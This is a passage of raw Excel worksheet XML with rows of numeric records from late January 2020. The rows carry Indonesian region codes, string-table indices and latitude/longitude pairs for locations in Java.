        <v>18631</v>
      </c>
      <c r="Y401" t="str">
        <f t="shared" si="6"/>
        <v>-6.34668,106.74467</v>
      </c>
    </row>
    <row r="402" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A402">
        <v>102053</v>
      </c>
      <c r="B402" s="1">
        <v>43856</v>
      </c>
      <c r="C402" s="2">
        <v>0.72692129629629632</v>
      </c>
      <c r="D402" t="s">
        <v>22</v>
      </c>
      <c r="E402" t="s">
        <v>23</v>
      </c>
      <c r="F402" t="s">
        <v>1837</v>
      </c>
      <c r="G402" t="s">
        <v>1838</v>
      </c>
      <c r="H402" t="s">
        <v>26</v>
      </c>
      <c r="I402" t="s">
        <v>1009</v>
      </c>
      <c r="J402" t="s">
        <v>37</v>
      </c>
      <c r="L402" t="s">
        <v>1839</v>
      </c>
      <c r="M402">
        <v>3674050001</v>
      </c>
      <c r="N402">
        <v>3674050</v>
      </c>
      <c r="O402">
        <v>3674</v>
      </c>
      <c r="P402">
        <v>36</v>
      </c>
      <c r="Q402" t="s">
        <v>1840</v>
      </c>
      <c r="R402" t="s">
        <v>1043</v>
      </c>
      <c r="S402" t="s">
        <v>170</v>
      </c>
      <c r="T402" t="s">
        <v>171</v>
      </c>
      <c r="U402" s="5">
        <v>10675160</v>
      </c>
      <c r="V402" s="5" t="s">
        <v>14823</v>
      </c>
      <c r="W402" s="5">
        <v>-631904</v>
      </c>
      <c r="X402" t="s">
        <v>18632</v>
      </c>
      <c r="Y402" t="str">
        <f t="shared" si="6"/>
        <v>-6.31904,106.75160</v>
      </c>
    </row>
    <row r="403" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A403">
        <v>102054</v>
      </c>
      <c r="B403" s="1">
        <v>43857</v>
      </c>
      <c r="C403" s="2">
        <v>3.4849537037037033E-2</v>
      </c>
      <c r="D403" t="s">
        <v>22</v>
      </c>
      <c r="E403" t="s">
        <v>23</v>
      </c>
      <c r="F403" t="s">
        <v>1841</v>
      </c>
      <c r="G403" t="s">
        <v>1842</v>
      </c>
      <c r="H403" t="s">
        <v>26</v>
      </c>
      <c r="I403" t="s">
        <v>1843</v>
      </c>
      <c r="J403" t="s">
        <v>1460</v>
      </c>
      <c r="L403" t="s">
        <v>1844</v>
      </c>
      <c r="M403">
        <v>3204280006</v>
      </c>
      <c r="N403">
        <v>3204280</v>
      </c>
      <c r="O403">
        <v>3204</v>
      </c>
      <c r="P403">
        <v>32</v>
      </c>
      <c r="Q403" t="s">
        <v>1806</v>
      </c>
      <c r="R403" t="s">
        <v>1807</v>
      </c>
      <c r="S403" t="s">
        <v>1464</v>
      </c>
      <c r="T403" t="s">
        <v>42</v>
      </c>
      <c r="U403" s="5">
        <v>10768602</v>
      </c>
      <c r="V403" s="5" t="s">
        <v>14824</v>
      </c>
      <c r="W403" s="5">
        <v>-697167</v>
      </c>
      <c r="X403" t="s">
        <v>18633</v>
      </c>
      <c r="Y403" t="str">
        <f t="shared" si="6"/>
        <v>-6.97167,107.68602</v>
      </c>
    </row>
    <row r="404" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A404">
        <v>102055</v>
      </c>
      <c r="B404" s="1">
        <v>43857</v>
      </c>
      <c r="C404" s="2">
        <v>2.0717592592592593E-3</v>
      </c>
      <c r="D404" t="s">
        <v>85</v>
      </c>
      <c r="E404" t="s">
        <v>23</v>
      </c>
      <c r="F404" t="s">
        <v>1845</v>
      </c>
      <c r="G404" t="s">
        <v>1846</v>
      </c>
      <c r="H404" t="s">
        <v>26</v>
      </c>
      <c r="J404" t="s">
        <v>37</v>
      </c>
      <c r="K404" t="s">
        <v>1847</v>
      </c>
      <c r="L404" t="s">
        <v>1848</v>
      </c>
      <c r="M404">
        <v>3275010010</v>
      </c>
      <c r="N404">
        <v>3275010</v>
      </c>
      <c r="O404">
        <v>3275</v>
      </c>
      <c r="P404">
        <v>32</v>
      </c>
      <c r="Q404" t="s">
        <v>286</v>
      </c>
      <c r="R404" t="s">
        <v>287</v>
      </c>
      <c r="S404" t="s">
        <v>41</v>
      </c>
      <c r="T404" t="s">
        <v>42</v>
      </c>
      <c r="U404" s="5">
        <v>10694399</v>
      </c>
      <c r="V404" s="5" t="s">
        <v>14825</v>
      </c>
      <c r="W404" s="5">
        <v>-625414</v>
      </c>
      <c r="X404" t="s">
        <v>18634</v>
      </c>
      <c r="Y404" t="str">
        <f t="shared" si="6"/>
        <v>-6.25414,106.94399</v>
      </c>
    </row>
    <row r="405" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A405">
        <v>102056</v>
      </c>
      <c r="B405" s="1">
        <v>43857</v>
      </c>
      <c r="C405" s="2">
        <v>0.37289351851851849</v>
      </c>
      <c r="D405" t="s">
        <v>85</v>
      </c>
      <c r="E405" t="s">
        <v>23</v>
      </c>
      <c r="F405" t="s">
        <v>1849</v>
      </c>
      <c r="G405" t="s">
        <v>1850</v>
      </c>
      <c r="H405" t="s">
        <v>26</v>
      </c>
      <c r="J405" t="s">
        <v>1128</v>
      </c>
      <c r="K405" t="s">
        <v>1851</v>
      </c>
      <c r="L405" t="s">
        <v>1852</v>
      </c>
      <c r="M405">
        <v>3404060005</v>
      </c>
      <c r="N405">
        <v>3404060</v>
      </c>
      <c r="O405">
        <v>3404</v>
      </c>
      <c r="P405">
        <v>34</v>
      </c>
      <c r="Q405" t="s">
        <v>1853</v>
      </c>
      <c r="R405" t="s">
        <v>1854</v>
      </c>
      <c r="S405" t="s">
        <v>1855</v>
      </c>
      <c r="T405" t="s">
        <v>1856</v>
      </c>
      <c r="U405" s="5">
        <v>11037442</v>
      </c>
      <c r="V405" s="5" t="s">
        <v>14826</v>
      </c>
      <c r="W405" s="5">
        <v>-775357</v>
      </c>
      <c r="X405" t="s">
        <v>18635</v>
      </c>
      <c r="Y405" t="str">
        <f t="shared" si="6"/>
        <v>-7.75357,110.37442</v>
      </c>
    </row>
    <row r="406" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A406">
        <v>102057</v>
      </c>
      <c r="B406" s="1">
        <v>43857</v>
      </c>
      <c r="C406" s="2">
        <v>0.69884259259259263</v>
      </c>
      <c r="D406" t="s">
        <v>22</v>
      </c>
      <c r="E406" t="s">
        <v>23</v>
      </c>
      <c r="F406" t="s">
        <v>1857</v>
      </c>
      <c r="G406" t="s">
        <v>1858</v>
      </c>
      <c r="H406" t="s">
        <v>26</v>
      </c>
      <c r="I406" t="s">
        <v>961</v>
      </c>
      <c r="J406" t="s">
        <v>1460</v>
      </c>
      <c r="L406" t="s">
        <v>1859</v>
      </c>
      <c r="M406">
        <v>3204280006</v>
      </c>
      <c r="N406">
        <v>3204280</v>
      </c>
      <c r="O406">
        <v>3204</v>
      </c>
      <c r="P406">
        <v>32</v>
      </c>
      <c r="Q406" t="s">
        <v>1806</v>
      </c>
      <c r="R406" t="s">
        <v>1807</v>
      </c>
      <c r="S406" t="s">
        <v>1464</v>
      </c>
      <c r="T406" t="s">
        <v>42</v>
      </c>
      <c r="U406" s="5">
        <v>10769256</v>
      </c>
      <c r="V406" s="5" t="s">
        <v>14827</v>
      </c>
      <c r="W406" s="5">
        <v>-698306</v>
      </c>
      <c r="X406" t="s">
        <v>18636</v>
      </c>
      <c r="Y406" t="str">
        <f t="shared" si="6"/>
        <v>-6.98306,107.69256</v>
      </c>
    </row>
    <row r="407" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A407">
        <v>102065</v>
      </c>
      <c r="B407" s="1">
        <v>43860</v>
      </c>
      <c r="C407" s="2">
        <v>0.33589120370370368</v>
      </c>
      <c r="D407" t="s">
        <v>22</v>
      </c>
      <c r="E407" t="s">
        <v>23</v>
      </c>
      <c r="F407" t="s">
        <v>1860</v>
      </c>
      <c r="G407" t="s">
        <v>1861</v>
      </c>
      <c r="H407" t="s">
        <v>26</v>
      </c>
      <c r="I407" t="s">
        <v>1862</v>
      </c>
      <c r="J407" t="s">
        <v>1128</v>
      </c>
      <c r="L407" t="s">
        <v>1863</v>
      </c>
      <c r="M407">
        <v>3205120004</v>
      </c>
      <c r="N407">
        <v>3205120</v>
      </c>
      <c r="O407">
        <v>3205</v>
      </c>
      <c r="P407">
        <v>32</v>
      </c>
      <c r="Q407" t="s">
        <v>1864</v>
      </c>
      <c r="R407" t="s">
        <v>1865</v>
      </c>
      <c r="S407" t="s">
        <v>1866</v>
      </c>
      <c r="T407" t="s">
        <v>42</v>
      </c>
      <c r="U407" s="5">
        <v>10782043</v>
      </c>
      <c r="V407" s="5" t="s">
        <v>14828</v>
      </c>
      <c r="W407" s="5">
        <v>-736519</v>
      </c>
      <c r="X407" t="s">
        <v>18637</v>
      </c>
      <c r="Y407" t="str">
        <f t="shared" si="6"/>
        <v>-7.36519,107.82043</v>
      </c>
    </row>
    <row r="408" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A408">
        <v>102074</v>
      </c>
      <c r="B408" s="1">
        <v>43860</v>
      </c>
      <c r="C408" s="2">
        <v>0.46642361111111108</v>
      </c>
      <c r="D408" t="s">
        <v>22</v>
      </c>
      <c r="E408" t="s">
        <v>23</v>
      </c>
      <c r="F408" t="s">
        <v>1867</v>
      </c>
      <c r="G408" t="s">
        <v>1868</v>
      </c>
      <c r="H408" t="s">
        <v>26</v>
      </c>
      <c r="I408" t="s">
        <v>788</v>
      </c>
      <c r="J408" t="s">
        <v>1869</v>
      </c>
      <c r="M408">
        <v>3171100002</v>
      </c>
      <c r="N408">
        <v>3171100</v>
      </c>
      <c r="O408">
        <v>3171</v>
      </c>
      <c r="P408">
        <v>31</v>
      </c>
      <c r="Q408" t="s">
        <v>1870</v>
      </c>
      <c r="R408" t="s">
        <v>107</v>
      </c>
      <c r="S408" t="s">
        <v>108</v>
      </c>
      <c r="T408" t="s">
        <v>33</v>
      </c>
      <c r="U408" s="5">
        <v>10683363</v>
      </c>
      <c r="V408" s="5" t="s">
        <v>14829</v>
      </c>
      <c r="W408" s="5">
        <v>-623171</v>
      </c>
      <c r="X408" t="s">
        <v>18638</v>
      </c>
      <c r="Y408" t="str">
        <f t="shared" si="6"/>
        <v>-6.23171,106.83363</v>
      </c>
    </row>
    <row r="409" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A409">
        <v>102076</v>
      </c>
      <c r="B409" s="1">
        <v>43860</v>
      </c>
      <c r="C409" s="2">
        <v>0.47015046296296298</v>
      </c>
      <c r="D409" t="s">
        <v>22</v>
      </c>
      <c r="E409" t="s">
        <v>23</v>
      </c>
      <c r="F409" t="s">
        <v>1871</v>
      </c>
      <c r="G409" t="s">
        <v>1872</v>
      </c>
      <c r="H409" t="s">
        <v>26</v>
      </c>
      <c r="I409" t="s">
        <v>1194</v>
      </c>
      <c r="J409" t="s">
        <v>1869</v>
      </c>
      <c r="L409" t="s">
        <v>1873</v>
      </c>
      <c r="M409">
        <v>3171100002</v>
      </c>
      <c r="N409">
        <v>3171100</v>
      </c>
      <c r="O409">
        <v>3171</v>
      </c>
      <c r="P409">
        <v>31</v>
      </c>
      <c r="Q409" t="s">
        <v>1870</v>
      </c>
      <c r="R409" t="s">
        <v>107</v>
      </c>
      <c r="S409" t="s">
        <v>108</v>
      </c>
      <c r="T409" t="s">
        <v>33</v>
      </c>
      <c r="U409" s="5">
        <v>10683437</v>
      </c>
      <c r="V409" s="5" t="s">
        <v>14830</v>
      </c>
      <c r="W409" s="5">
        <v>-623208</v>
      </c>
      <c r="X409" t="s">
        <v>18639</v>
      </c>
      <c r="Y409" t="str">
        <f t="shared" si="6"/>
        <v>-6.23208,106.83437</v>
      </c>
    </row>
    <row r="410" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A410">
        <v>102077</v>
      </c>
      <c r="B410" s="1">
        <v>43860</v>
      </c>
      <c r="C410" s="2">
        <v>0.523900462962963</v>
      </c>
      <c r="D410" t="s">
        <v>22</v>
      </c>
      <c r="E410" t="s">
        <v>23</v>
      </c>
      <c r="F410" t="s">
        <v>1874</v>
      </c>
      <c r="G410" t="s">
        <v>1875</v>
      </c>
      <c r="H410" t="s">
        <v>26</v>
      </c>
      <c r="I410" t="s">
        <v>1090</v>
      </c>
      <c r="J410" t="s">
        <v>586</v>
      </c>
      <c r="L410" t="s">
        <v>1876</v>
      </c>
      <c r="M410">
        <v>3173050002</v>
      </c>
      <c r="N410">
        <v>3173050</v>
      </c>
      <c r="O410">
        <v>3173</v>
      </c>
      <c r="P410">
        <v>31</v>
      </c>
      <c r="Q410" t="s">
        <v>588</v>
      </c>
      <c r="R410" t="s">
        <v>589</v>
      </c>
      <c r="S410" t="s">
        <v>62</v>
      </c>
      <c r="T410" t="s">
        <v>33</v>
      </c>
      <c r="U410" s="5">
        <v>10686539</v>
      </c>
      <c r="V410" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W410" s="5">
        <v>-617605</v>
      </c>
      <c r="X410" t="s">
        <v>18379</v>
      </c>
      <c r="Y410" t="str">
        <f t="shared" si="6"/>
        <v>-6.17605,106.86539</v>
      </c>
    </row>
    <row r="411" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A411">
        <v>102080</v>
      </c>
      <c r="B411" s="1">
        <v>43861</v>
      </c>
      <c r="C411" s="2">
        <v>0.12063657407407408</v>
      </c>
      <c r="D411" t="s">
        <v>22</v>
      </c>
      <c r="E411" t="s">
        <v>23</v>
      </c>
      <c r="F411" t="s">
        <v>1877</v>
      </c>
      <c r="G411" t="s">
        <v>1878</v>
      </c>
      <c r="H411" t="s">
        <v>26</v>
      </c>
      <c r="I411" t="s">
        <v>592</v>
      </c>
      <c r="J411" t="s">
        <v>1879</v>
      </c>
      <c r="L411" t="s">
        <v>1880</v>
      </c>
      <c r="M411">
        <v>3173080003</v>
      </c>
      <c r="N411">
        <v>3173080</v>
      </c>
      <c r="O411">
        <v>3173</v>
      </c>
      <c r="P411">
        <v>31</v>
      </c>
      <c r="Q411" t="s">
        <v>157</v>
      </c>
      <c r="R411" t="s">
        <v>157</v>
      </c>
      <c r="S411" t="s">
        <v>62</v>
      </c>
      <c r="T411" t="s">
        <v>33</v>
      </c>
      <c r="U411" s="5">
        <v>10682209</v>
      </c>
      <c r="V411" s="5" t="s">
        <v>14831</v>
      </c>
      <c r="W411" s="5">
        <v>-617248</v>
      </c>
      <c r="X411" t="s">
        <v>18640</v>
      </c>
      <c r="Y411" t="str">
        <f t="shared" si="6"/>
        <v>-6.17248,106.82209</v>
      </c>
    </row>
    <row r="412" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A412">
        <v>102081</v>
      </c>
      <c r="B412" s="1">
        <v>43861</v>
      </c>
      <c r="C412" s="2">
        <v>0.41847222222222219</v>
      </c>
      <c r="D412" t="s">
        <v>22</v>
      </c>
      <c r="E412" t="s">
        <v>23</v>
      </c>
      <c r="F412" t="s">
        <v>1881</v>
      </c>
      <c r="H412" t="s">
        <v>26</v>
      </c>
      <c r="I412" t="s">
        <v>1689</v>
      </c>
      <c r="J412" t="s">
        <v>1342</v>
      </c>
      <c r="L412" t="s">
        <v>1882</v>
      </c>
      <c r="M412">
        <v>3578160003</v>
      </c>
      <c r="N412">
        <v>3578160</v>
      </c>
      <c r="O412">
        <v>3578</v>
      </c>
      <c r="P412">
        <v>35</v>
      </c>
      <c r="Q412" t="s">
        <v>1883</v>
      </c>
      <c r="R412" t="s">
        <v>1884</v>
      </c>
      <c r="S412" t="s">
        <v>1346</v>
      </c>
      <c r="T412" t="s">
        <v>1221</v>
      </c>
      <c r="U412" s="5">
        <v>11270527</v>
      </c>
      <c r="V412" s="5" t="s">
        <v>14832</v>
      </c>
      <c r="W412" s="5">
        <v>-727332</v>
      </c>
      <c r="X412" t="s">
        <v>18641</v>
      </c>
      <c r="Y412" t="str">
        <f t="shared" si="6"/>
        <v>-7.27332,112.70527</v>
      </c>
    </row>
    <row r="413" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A413">
        <v>102082</v>
      </c>
      <c r="B413" s="1">
        <v>43861</v>
      </c>
      <c r="C413" s="2">
        <v>0.45734953703703707</v>
      </c>
      <c r="D413" t="s">
        <v>22</v>
      </c>
      <c r="E413" t="s">
        <v>23</v>
      </c>
      <c r="F413" t="s">
        <v>1885</v>
      </c>
      <c r="H413" t="s">
        <v>26</v>
      </c>
      <c r="I413" t="s">
        <v>1340</v>
      </c>
      <c r="J413" t="s">
        <v>1342</v>
      </c>
      <c r="L413" t="s">
        <v>1886</v>
      </c>
      <c r="M413">
        <v>3578040002</v>
      </c>
      <c r="N413">
        <v>3578040</v>
      </c>
      <c r="O413">
        <v>3578</v>
      </c>
      <c r="P413">
        <v>35</v>
      </c>
      <c r="Q413" t="s">
        <v>1887</v>
      </c>
      <c r="R413" t="s">
        <v>1888</v>
      </c>
      <c r="S413" t="s">
        <v>1346</v>
      </c>
      <c r="T413" t="s">
        <v>1221</v>
      </c>
      <c r="U413" s="5">
        <v>11273441</v>
      </c>
      <c r="V413" s="5" t="s">
        <v>14833</v>
      </c>
      <c r="W413" s="5">
        <v>-732074</v>
      </c>
      <c r="X413" t="s">
        <v>18642</v>
      </c>
      <c r="Y413" t="str">
        <f t="shared" si="6"/>
        <v>-7.32074,112.73441</v>
      </c>
    </row>
    <row r="414" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A414">
        <v>102083</v>
      </c>
      <c r="B414" s="1">
        <v>43861</v>
      </c>
      <c r="C414" s="2">
        <v>0.46583333333333332</v>
      </c>
      <c r="D414" t="s">
        <v>22</v>
      </c>
      <c r="E414" t="s">
        <v>23</v>
      </c>
      <c r="F414" t="s">
        <v>1889</v>
      </c>
      <c r="G414" t="s">
        <v>1890</v>
      </c>
      <c r="H414" t="s">
        <v>26</v>
      </c>
      <c r="I414" t="s">
        <v>1891</v>
      </c>
      <c r="J414" t="s">
        <v>1342</v>
      </c>
      <c r="L414" t="s">
        <v>1892</v>
      </c>
      <c r="M414">
        <v>3578110001</v>
      </c>
      <c r="N414">
        <v>3578110</v>
      </c>
      <c r="O414">
        <v>3578</v>
      </c>
      <c r="P414">
        <v>35</v>
      </c>
      <c r="Q414" t="s">
        <v>1893</v>
      </c>
      <c r="R414" t="s">
        <v>1894</v>
      </c>
      <c r="S414" t="s">
        <v>1346</v>
      </c>
      <c r="T414" t="s">
        <v>1221</v>
      </c>
      <c r="U414" s="5">
        <v>11273327</v>
      </c>
      <c r="V414" s="5" t="s">
        <v>14834</v>
      </c>
      <c r="W414" s="5">
        <v>-729564</v>
      </c>
      <c r="X414" t="s">
        <v>18643</v>
      </c>
      <c r="Y414" t="str">
        <f t="shared" si="6"/>
        <v>-7.29564,112.73327</v>
      </c>
    </row>
    <row r="415" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A415">
        <v>102084</v>
      </c>
      <c r="B415" s="1">
        <v>43861</v>
      </c>
      <c r="C415" s="2">
        <v>0.46798611111111116</v>
      </c>
      <c r="D415" t="s">
        <v>22</v>
      </c>
      <c r="E415" t="s">
        <v>23</v>
      </c>
      <c r="F415" t="s">
        <v>1895</v>
      </c>
      <c r="G415" t="s">
        <v>1896</v>
      </c>
      <c r="H415" t="s">
        <v>26</v>
      </c>
      <c r="I415" t="s">
        <v>72</v>
      </c>
      <c r="J415" t="s">
        <v>1460</v>
      </c>
      <c r="L415" t="s">
        <v>1897</v>
      </c>
      <c r="M415">
        <v>3273170003</v>
      </c>
      <c r="N415">
        <v>3273170</v>
      </c>
      <c r="O415">
        <v>3273</v>
      </c>
      <c r="P415">
        <v>32</v>
      </c>
      <c r="Q415" t="s">
        <v>1898</v>
      </c>
      <c r="R415" t="s">
        <v>1899</v>
      </c>
      <c r="S415" t="s">
        <v>1464</v>
      </c>
      <c r="T415" t="s">
        <v>42</v>
      </c>
      <c r="U415" s="5">
        <v>10761932</v>
      </c>
      <c r="V415" s="5" t="s">
        <v>14835</v>
      </c>
      <c r="W415" s="5">
        <v>-691688</v>
      </c>
      <c r="X415" t="s">
        <v>18644</v>
      </c>
      <c r="Y415" t="str">
        <f t="shared" si="6"/>
        <v>-6.91688,107.61932</v>
      </c>
    </row>
    <row r="416" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A416">
        <v>102085</v>
      </c>
      <c r="B416" s="1">
        <v>43861</v>
      </c>
      <c r="C416" s="2">
        <v>0.47862268518518519</v>
      </c>
      <c r="D416" t="s">
        <v>22</v>
      </c>
      <c r="E416" t="s">
        <v>23</v>
      </c>
      <c r="F416" t="s">
        <v>1900</v>
      </c>
      <c r="G416" t="s">
        <v>1901</v>
      </c>
      <c r="H416" t="s">
        <v>26</v>
      </c>
      <c r="I416" t="s">
        <v>166</v>
      </c>
      <c r="J416" t="s">
        <v>1342</v>
      </c>
      <c r="M416">
        <v>3578100005</v>
      </c>
      <c r="N416">
        <v>3578100</v>
      </c>
      <c r="O416">
        <v>3578</v>
      </c>
      <c r="P416">
        <v>35</v>
      </c>
      <c r="Q416" t="s">
        <v>1902</v>
      </c>
      <c r="R416" t="s">
        <v>1545</v>
      </c>
      <c r="S416" t="s">
        <v>1346</v>
      </c>
      <c r="T416" t="s">
        <v>1221</v>
      </c>
      <c r="U416" s="5">
        <v>11275720</v>
      </c>
      <c r="V416" s="5" t="s">
        <v>14836</v>
      </c>
      <c r="W416" s="5">
        <v>-727397</v>
      </c>
      <c r="X416" t="s">
        <v>18645</v>
      </c>
      <c r="Y416" t="str">
        <f t="shared" si="6"/>
        <v>-7.27397,112.75720</v>
      </c>
    </row>
    <row r="417" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A417">
        <v>102086</v>
      </c>
      <c r="B417" s="1">
        <v>43861</v>
      </c>
      <c r="C417" s="2">
        <v>0.49540509259259258</v>
      </c>
      <c r="D417" t="s">
        <v>22</v>
      </c>
      <c r="E417" t="s">
        <v>23</v>
      </c>
      <c r="F417" t="s">
        <v>1903</v>
      </c>
      <c r="G417" t="s">
        <v>1904</v>
      </c>
      <c r="H417" t="s">
        <v>26</v>
      </c>
      <c r="I417" t="s">
        <v>788</v>
      </c>
      <c r="J417" t="s">
        <v>1128</v>
      </c>
      <c r="M417">
        <v>3308080003</v>
      </c>
      <c r="N417">
        <v>3308080</v>
      </c>
      <c r="O417">
        <v>3308</v>
      </c>
      <c r="P417">
        <v>33</v>
      </c>
      <c r="Q417" t="s">
        <v>1905</v>
      </c>
      <c r="R417" t="s">
        <v>1906</v>
      </c>
      <c r="S417" t="s">
        <v>1907</v>
      </c>
      <c r="T417" t="s">
        <v>1134</v>
      </c>
      <c r="U417" s="5">
        <v>11021899</v>
      </c>
      <c r="V417" s="5" t="s">
        <v>14837</v>
      </c>
      <c r="W417" s="5">
        <v>-758538</v>
      </c>
      <c r="X417" t="s">
        <v>18646</v>
      </c>
      <c r="Y417" t="str">
        <f t="shared" si="6"/>
        <v>-7.58538,110.21899</v>
      </c>
    </row>
    <row r="418" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A418">
        <v>102087</v>
      </c>
      <c r="B418" s="1">
        <v>43861</v>
      </c>
      <c r="C418" s="2">
        <v>0.50739583333333338</v>
      </c>
      <c r="D418" t="s">
        <v>22</v>
      </c>
      <c r="E418" t="s">
        <v>23</v>
      </c>
      <c r="F418" t="s">
        <v>1908</v>
      </c>
      <c r="H418" t="s">
        <v>26</v>
      </c>
      <c r="I418" t="s">
        <v>1909</v>
      </c>
      <c r="J418" t="s">
        <v>1342</v>
      </c>
      <c r="L418" t="s">
        <v>1910</v>
      </c>
      <c r="M418">
        <v>3578110004</v>
      </c>
      <c r="N418">
        <v>3578110</v>
      </c>
      <c r="O418">
        <v>3578</v>
      </c>
      <c r="P418">
        <v>35</v>
      </c>
      <c r="Q418" t="s">
        <v>1911</v>
      </c>
      <c r="R418" t="s">
        <v>1894</v>
      </c>
      <c r="S418" t="s">
        <v>1346</v>
      </c>
      <c r="T418" t="s">
        <v>1221</v>
      </c>
      <c r="U418" s="5">
        <v>11274580</v>
      </c>
      <c r="V418" s="5" t="s">
        <v>14838</v>
      </c>
      <c r="W418" s="5">
        <v>-729546</v>
      </c>
      <c r="X418" t="s">
        <v>18647</v>
      </c>
      <c r="Y418" t="str">
        <f t="shared" si="6"/>
        <v>-7.29546,112.74580</v>
      </c>
    </row>
    <row r="419" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A419">
        <v>102089</v>
      </c>
      <c r="B419" s="1">
        <v>43861</v>
      </c>
      <c r="C419" s="2">
        <v>0.51431712962962961</v>
      </c>
      <c r="D419" t="s">
        <v>22</v>
      </c>
      <c r="E419" t="s">
        <v>23</v>
      </c>
      <c r="F419" t="s">
        <v>1912</v>
      </c>
      <c r="G419" t="s">
        <v>1913</v>
      </c>
      <c r="H419" t="s">
        <v>26</v>
      </c>
      <c r="I419" t="s">
        <v>517</v>
      </c>
      <c r="J419" t="s">
        <v>1342</v>
      </c>
      <c r="L419" t="s">
        <v>1914</v>
      </c>
      <c r="M419">
        <v>3578110006</v>
      </c>
      <c r="N419">
        <v>3578110</v>
      </c>
      <c r="O419">
        <v>3578</v>
      </c>
      <c r="P419">
        <v>35</v>
      </c>
      <c r="Q419" t="s">
        <v>1915</v>
      </c>
      <c r="R419" t="s">
        <v>1894</v>
      </c>
      <c r="S419" t="s">
        <v>1346</v>
      </c>
      <c r="T419" t="s">
        <v>1221</v>
      </c>
      <c r="U419" s="5">
        <v>11273919</v>
      </c>
      <c r="V419" s="5" t="s">
        <v>14839</v>
      </c>
      <c r="W419" s="5">
        <v>-729316</v>
      </c>
      <c r="X419" t="s">
        <v>18648</v>
      </c>
      <c r="Y419" t="str">
        <f t="shared" si="6"/>
        <v>-7.29316,112.73919</v>
      </c>
    </row>
    <row r="420" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A420">
        <v>102090</v>
      </c>
      <c r="B420" s="1">
        <v>43861</v>
      </c>
      <c r="C420" s="2">
        <v>0.51888888888888884</v>
      </c>
      <c r="D420" t="s">
        <v>22</v>
      </c>
      <c r="E420" t="s">
        <v>23</v>
      </c>
      <c r="F420" t="s">
        <v>1916</v>
      </c>
      <c r="G420" t="s">
        <v>1917</v>
      </c>
      <c r="H420" t="s">
        <v>26</v>
      </c>
      <c r="I420" t="s">
        <v>1891</v>
      </c>
      <c r="J420" t="s">
        <v>1342</v>
      </c>
      <c r="L420" t="s">
        <v>250</v>
      </c>
      <c r="M420">
        <v>3578100001</v>
      </c>
      <c r="N420">
        <v>3578100</v>
      </c>
      <c r="O420">
        <v>3578</v>
      </c>
      <c r="P420">
        <v>35</v>
      </c>
      <c r="Q420" t="s">
        <v>1918</v>
      </c>
      <c r="R420" t="s">
        <v>1545</v>
      </c>
      <c r="S420" t="s">
        <v>1346</v>
      </c>
      <c r="T420" t="s">
        <v>1221</v>
      </c>
      <c r="U420" s="5">
        <v>11275734</v>
      </c>
      <c r="V420" s="5" t="s">
        <v>14840</v>
      </c>
      <c r="W420" s="5">
        <v>-729691</v>
      </c>
      <c r="X420" t="s">
        <v>18649</v>
      </c>
      <c r="Y420" t="str">
        <f t="shared" si="6"/>
        <v>-7.29691,112.75734</v>
      </c>
    </row>
    <row r="421" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A421">
        <v>102091</v>
      </c>
      <c r="B421" s="1">
        <v>43861</v>
      </c>
      <c r="C421" s="2">
        <v>0.52546296296296291</v>
      </c>
      <c r="D421" t="s">
        <v>22</v>
      </c>
      <c r="E421" t="s">
        <v>23</v>
      </c>
      <c r="F421" t="s">
        <v>1919</v>
      </c>
      <c r="G421" t="s">
        <v>1920</v>
      </c>
      <c r="H421" t="s">
        <v>26</v>
      </c>
      <c r="I421" t="s">
        <v>72</v>
      </c>
      <c r="J421" t="s">
        <v>1342</v>
      </c>
      <c r="M421">
        <v>3578110003</v>
      </c>
      <c r="N421">
        <v>3578110</v>
      </c>
      <c r="O421">
        <v>3578</v>
      </c>
      <c r="P421">
        <v>35</v>
      </c>
      <c r="Q421" t="s">
        <v>1921</v>
      </c>
      <c r="R421" t="s">
        <v>1894</v>
      </c>
      <c r="S421" t="s">
        <v>1346</v>
      </c>
      <c r="T421" t="s">
        <v>1221</v>
      </c>
      <c r="U421" s="5">
        <v>11275087</v>
      </c>
      <c r="V421" s="5" t="s">
        <v>14841</v>
      </c>
      <c r="W421" s="5">
        <v>-730585</v>
      </c>
      <c r="X421" t="s">
        <v>18650</v>
      </c>
      <c r="Y421" t="str">
        <f t="shared" si="6"/>
        <v>-7.30585,112.75087</v>
      </c>
    </row>
    <row r="422" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A422">
        <v>102092</v>
      </c>
      <c r="B422" s="1">
        <v>43861</v>
      </c>
      <c r="C422" s="2">
        <v>0.53054398148148152</v>
      </c>
      <c r="D422" t="s">
        <v>22</v>
      </c>
      <c r="E422" t="s">
        <v>23</v>
      </c>
      <c r="F422" t="s">
        <v>1922</v>
      </c>
      <c r="H422" t="s">
        <v>26</v>
      </c>
      <c r="I422" t="s">
        <v>166</v>
      </c>
      <c r="J422" t="s">
        <v>1342</v>
      </c>
      <c r="L422" t="s">
        <v>1923</v>
      </c>
      <c r="M422">
        <v>3578110002</v>
      </c>
      <c r="N422">
        <v>3578110</v>
      </c>
      <c r="O422">
        <v>3578</v>
      </c>
      <c r="P422">
        <v>35</v>
      </c>
      <c r="Q422" t="s">
        <v>1894</v>
      </c>
      <c r="R422" t="s">
        <v>1894</v>
      </c>
      <c r="S422" t="s">
        <v>1346</v>
      </c>
      <c r="T422" t="s">
        <v>1221</v>
      </c>
      <c r="U422" s="5">
        <v>11273559</v>
      </c>
      <c r="V422" s="5" t="s">
        <v>14842</v>
      </c>
      <c r="W422" s="5">
        <v>-730631</v>
      </c>
      <c r="X422" t="s">
        <v>18651</v>
      </c>
      <c r="Y422" t="str">
        <f t="shared" si="6"/>
        <v>-7.30631,112.73559</v>
      </c>
    </row>
